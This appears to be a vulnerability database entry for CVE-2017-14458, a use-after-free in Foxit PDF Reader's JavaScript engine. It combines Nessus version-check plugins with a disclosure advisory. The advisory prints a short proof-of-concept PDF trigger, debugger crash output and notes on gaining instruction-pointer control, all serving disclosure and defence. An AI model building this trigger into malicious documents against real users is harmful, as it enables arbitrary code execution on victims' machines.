Vulnerabilities > CVE-2017-14458 - Use After Free vulnerability in Foxit PDF Reader 8.3.2.25013
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Common Weakness Enumeration (CWE)
Nessus
NASL family Windows NASL id FOXIT_PHANTOM_8_3_6.NASL description According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 119837 published 2018-12-21 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/119837 title Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(119837); script_version("1.3"); script_cvs_date("Date: 2019/10/31 15:18:52"); script_cve_id( "CVE-2017-14458", "CVE-2017-17557", "CVE-2018-3842", "CVE-2018-3843", "CVE-2018-3850", "CVE-2018-3853", "CVE-2018-10302", "CVE-2018-10303" ); script_bugtraq_id(103942, 103999); script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities"); script_summary(english:"Checks the version of Foxit PhantomPDF."); script_set_attribute(attribute:"synopsis", value: "A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities."); # https://www.foxitsoftware.com/support/security-bulletins.php script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e"); script_set_attribute(attribute:"solution", value: "Upgrade to Foxit PhantomPDF version 8.3.6 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom"); script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("foxit_phantom_installed.nasl"); script_require_keys("installed_sw/FoxitPhantomPDF"); exit(0); } include('vcf.inc'); app = 'FoxitPhantomPDF'; app_info = vcf::get_app_info(app:app, win_local:TRUE); constraints = [{ 'min_version' : '8.0', 'max_version' : '8.3.5.30351', 'fixed_version' : '8.3.6' }]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
NASL family Windows NASL id FOXIT_READER_9_1_0_5096.NASL description The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. last seen 2020-04-30 modified 2018-04-27 plugin id 109399 published 2018-04-27 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109399 title Foxit Reader < 9.1 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(109399); script_version("1.6"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27"); script_cve_id( "CVE-2017-14458", "CVE-2017-17557", "CVE-2018-3842", "CVE-2018-3850", "CVE-2018-3853" ); script_bugtraq_id(103942); script_xref(name:"ZDI", value:"ZDI-18-312"); script_xref(name:"ZDI", value:"ZDI-18-313"); script_xref(name:"ZDI", value:"ZDI-18-315"); script_xref(name:"ZDI", value:"ZDI-18-329"); script_xref(name:"ZDI", value:"ZDI-18-330"); script_xref(name:"ZDI", value:"ZDI-18-331"); script_xref(name:"ZDI", value:"ZDI-18-332"); script_xref(name:"ZDI", value:"ZDI-18-335"); script_xref(name:"ZDI", value:"ZDI-18-339"); script_xref(name:"ZDI", value:"ZDI-18-340"); script_xref(name:"ZDI", value:"ZDI-18-341"); script_xref(name:"ZDI", value:"ZDI-18-342"); script_xref(name:"ZDI", value:"ZDI-18-344"); script_xref(name:"ZDI", value:"ZDI-18-345"); script_xref(name:"ZDI", value:"ZDI-18-346"); script_xref(name:"ZDI", value:"ZDI-18-348"); script_xref(name:"ZDI", value:"ZDI-18-349"); script_xref(name:"ZDI", value:"ZDI-18-350"); script_xref(name:"ZDI", value:"ZDI-18-351"); script_xref(name:"ZDI", value:"ZDI-18-352"); script_xref(name:"ZDI", value:"ZDI-18-354"); script_xref(name:"ZDI", value:"ZDI-18-358"); script_xref(name:"ZDI", value:"ZDI-18-359"); script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities"); script_summary(english:"Checks the version of Foxit Reader."); script_set_attribute(attribute:"synopsis", value: "A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities."); script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php"); script_set_attribute(attribute:"solution", value: "Upgrade to Foxit Reader version 9.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19"); script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("foxit_reader_installed.nasl"); script_require_keys("installed_sw/Foxit Reader"); exit(0); } include('vcf.inc'); app = 'Foxit Reader'; app_info = vcf::get_app_info(app:app, win_local:TRUE); constraints = [{ 'min_version' : '9.0', 'fixed_version' : '9.1.0.5096' }]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
NASL family Windows NASL id FOXIT_PHANTOM_9_1_0_5096.NASL description According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 109398 published 2018-04-27 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109398 title Foxit PhantomPDF < 9.1 Multiple Vulnerabilities NASL family Windows NASL id FOXIT_PHANTOM_9_1_0.NASL description According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. last seen 2020-04-30 modified 2018-12-21 plugin id 119838 published 2018-12-21 reporter This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/119838 title Foxit PhantomPDF < 9.1 Multiple Vulnerabilities
Seebug
bulletinFamily | exploit |
description | ### Summary An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability. ### Tested Versions Foxit Software Foxit PDF Reader 8.3.2.25013. ### Product URLs https://www.foxitsoftware.com/products/pdf-reader/ ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ### CWE CWE-416: Use After Free ### Details Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. When executing embedded JavaScript code, a document can be closed, which essentially frees a lot of used objects, but the JavaScript can continue to execute. Invoking a method which keeps a stale reference to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code. This particular vulnerability lies in this.search.query() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document: ``` 7 0 obj << >> stream this.closeDoc(); this.search.query( ); endstream endobj ``` Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash: ``` (498.14fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader_Lib_Full.exe - eax=00000000 ebx=21152ff8 ecx=107f0de8 edx=00000000 esi=1b630ff8 edi=037def5c eip=01562a78 esp=037ded5c ebp=037dedb0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58: 01562a78 8b11 mov edx,dword ptr [ecx] ds:002b:107f0de8=???????? 0:000> !heap -p -a ecx address 107f0de8 found in _DPH_HEAP_ROOT @ d4f1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 107414e0: 107f0000 2000 6bf4ab22 verifier!AVrfDebugPageHeapFree+0x000000c2 77c158e8 ntdll!RtlDebugFreeHeap+0x0000003c 77bc5bed ntdll!RtlpFreeHeap+0x0005616d 77b6fa0d ntdll!RtlFreeHeap+0x000007cd 0075bd5b FoxitReader_Lib_Full+0x005cbd5b 002bb657 FoxitReader_Lib_Full+0x0012b657 002be4d5 FoxitReader_Lib_Full+0x0012e4d5 0046596c FoxitReader_Lib_Full+0x002d596c 0046568f FoxitReader_Lib_Full+0x002d568f 0047d114 FoxitReader_Lib_Full+0x002ed114 005ca8e6 FoxitReader_Lib_Full+0x0043a8e6 0045c7ad FoxitReader_Lib_Full+0x002cc7ad 0045c4bf FoxitReader_Lib_Full+0x002cc4bf 005c043e FoxitReader_Lib_Full+0x0043043e 005ba7f6 FoxitReader_Lib_Full+0x0042a7f6 005be7b7 FoxitReader_Lib_Full+0x0042e7b7 005be846 FoxitReader_Lib_Full+0x0042e846 751ee0bb USER32!_InternalCallWinProc+0x0000002b 751f8849 USER32!InternalCallWinProc+0x00000020 751fb145 USER32!UserCallWinProcCheckWow+0x000001be 751e8503 USER32!DispatchClientMessage+0x000001b3 751e8aa0 USER32!__fnDWORD+0x00000050 77ba0bad ntdll!KiUserCallbackDispatcher+0x0000004d 751db95b USER32!SendMessageW+0x0000005b 00459022 FoxitReader_Lib_Full+0x002c9022 005c0667 FoxitReader_Lib_Full+0x00430667 005ba7f6 FoxitReader_Lib_Full+0x0042a7f6 005be7b7 FoxitReader_Lib_Full+0x0042e7b7 005be846 FoxitReader_Lib_Full+0x0042e846 751ee0bb USER32!_InternalCallWinProc+0x0000002b 751f8849 USER32!InternalCallWinProc+0x00000020 751fb145 USER32!UserCallWinProcCheckWow+0x000001be ``` Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the next few instructions we can see the following: ``` 0:000> u FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58: 01562a78 8b11 mov edx,dword ptr [ecx] 01562a7a 8b4d0c mov ecx,dword ptr [ebp+0Ch] 01562a7d 8b8254020000 mov eax,dword ptr [edx+254h] 01562a83 ffd0 call eax ``` We can observe from the above listing that twice-dereferenced address from ecx, through edx+0x254 ends up in eax which is then used as argument to call instruction. This makes this vulnerability easy to exploit, since we can control the contents of ecx. With a bit of memory layout control, and with PageHeap off, we can get full EIP control: ``` (2ac4.25e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader_Lib_Full.exe - eax=41414141 ebx=0c6d5a60 ecx=0c665a20 edx=0c6b3948 esi=0c6d5950 edi=044ff464 eip=41414141 esp=044ff260 ebp=044ff2b8 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 41414141 ?? ??? 0:000> k ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 03aff0fc 01562a85 0x41414141 03aff158 01668d7f FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c65 03aff200 01668632 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6f5f 03aff2b4 005a1a57 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6812 03aff2ec 01425a6e FoxitReader_Lib_Full+0x411a57 03aff320 0141d876 FoxitReader_Lib_Full!CryptUIWizExport+0x473c4e 03aff388 0141fc23 FoxitReader_Lib_Full!CryptUIWizExport+0x46ba56 03aff398 1640a0d6 FoxitReader_Lib_Full!CryptUIWizExport+0x46de03 03aff3b8 16444b63 0x1640a0d6 ``` Closing the document via JavaScript frees objects, but JavaScript continues to execute, and some stale references can cause a use after free, which is what happens in this case. Since the memory pointed at by ecx is freed, a careful heap manipulation can put it under attacker control, indirectly giving the control over eax, leading to arbitrary code execution. ### Timeline * 2017-12-12 - Vendor Disclosure * 2017-12-12 - Discussion with vendor on issues * 2018-01-29 - Vendor advised issue fixed in code scheduled for next release early April * 2018-04-01 - Vendor pushed release to mid April * 2018-04-19 - Vendor patch released * 2018-04-19 - Public disclosure |
id | SSV:97301 |
last seen | 2018-06-08 |
modified | 2018-05-17 |
published | 2018-05-17 |
reporter | Knownsec |
title | Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability(CVE-2017-14458) |
Talos
id | TALOS-2017-0506 |
last seen | 2019-05-29 |
published | 2018-04-19 |
reporter | Talos Intelligence |
source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506 |
title | Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability |
References
- http://www.securityfocus.com/bid/103942
- http://www.securityfocus.com/bid/103942
- http://www.securitytracker.com/id/1040733
- http://www.securitytracker.com/id/1040733
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506